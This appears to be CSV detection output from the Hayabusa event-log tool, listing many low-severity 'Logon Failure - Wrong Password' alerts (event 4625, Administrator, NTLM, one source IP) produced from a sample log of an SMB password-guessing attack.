NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W5UHqVVAYK08FWit | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKHLHN59FDnD92Sm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.829 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ohAKPRGvg1JCQ91y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxdcrng84HEG39nJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lFGXFxHPbxDTGmiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tyFnafBgzoLQWTQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2IjLjxkd2pX4moFy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9vqYC4KotCYTcQv5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qtHcYFIOHglQFb60 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmiHIQrpsAVRJtdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4TdkChjMAviJ6jr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPIGU1rBk0F5cG9P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ScynGWKK3CtoUsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:22.373 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0E4JAuxC8MuuGfnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4aDJtqsUWKyuDqBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCFrEHUgqCtKPybS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ftrEBfaLGbboV8D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: thle3slH6gZYllyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PcEnabS7oj98WI0e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EBqGp9CD4A9PsyLk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iil8dQlzMCkKRNUb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nDBqxF9bmNNjNdsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJNBRV3BRVEN8hmG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OGl1Tbdw7PDvVsRR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uspHTc4JwnjjZQti | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Exq3nfy1LeFOPcA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vdFC4g7vsLO0zOzL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HpdCohLheoqQ6DXw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHS3sclMwgHuH8rE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sNSheImuQwgOEH5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GX5y374mlYYXbAB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaFRL6q9KQY5bFHZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrkEyJmfLiSrvQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fd1vJiJa3pdjqdQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RVrZl3LOIa7VLhT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TKR8KbyQkwRX1qTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GY22XuDxbE5lvEra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4AntiX3j9HLHcOOq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIvMbod41WeNADy5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0UL4lb3CCrv7YfGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OyRktDjPqFyrdSTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKEGmAH8Wbc7f3jC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06Dfi4lO2Vdw3gCr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29eXmenUTACkAHKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Zq7Gl6hnKDJJqFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jKENlWYt6m78taZR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 822SUU2Hg6w6AqQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bROU0Mk9Z4yEq323 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKfVPleDpLLqkuKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NGWVqbchMitnLVYT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7K9vifU9lWwpP9J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIgKYj210JfICJXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jisuKilPQivTV8yE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hckyoom0XnqpRzK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: De0l6qgcuhMERjMY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SSa7pylPWn8jl2Ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ol9OntO4hqidlNUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kXOBF0ZWLxMauHuT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVBFJltkR5vnmpYD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kHVXEHq9zNYdfTpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OIw3BxmLsfwDXXFg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hhgRhjnhkRJus4fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xz78guWXrekEvuFT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 04wNT26RJmriQrfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XmbuuymdSpfNldt2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yqJarBVOImq5Tn2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BZYExQroYH65tPuG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llU5DQBrIrV3VtG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HV17iXOYQqs2ntax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esZnEeyGdPa22PsL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rlYFTP9a2wdi5A2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJifU0PnO1Ntp6z3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGKdKjJy28Qd1whT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3L4BYjYJYlvuYHE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
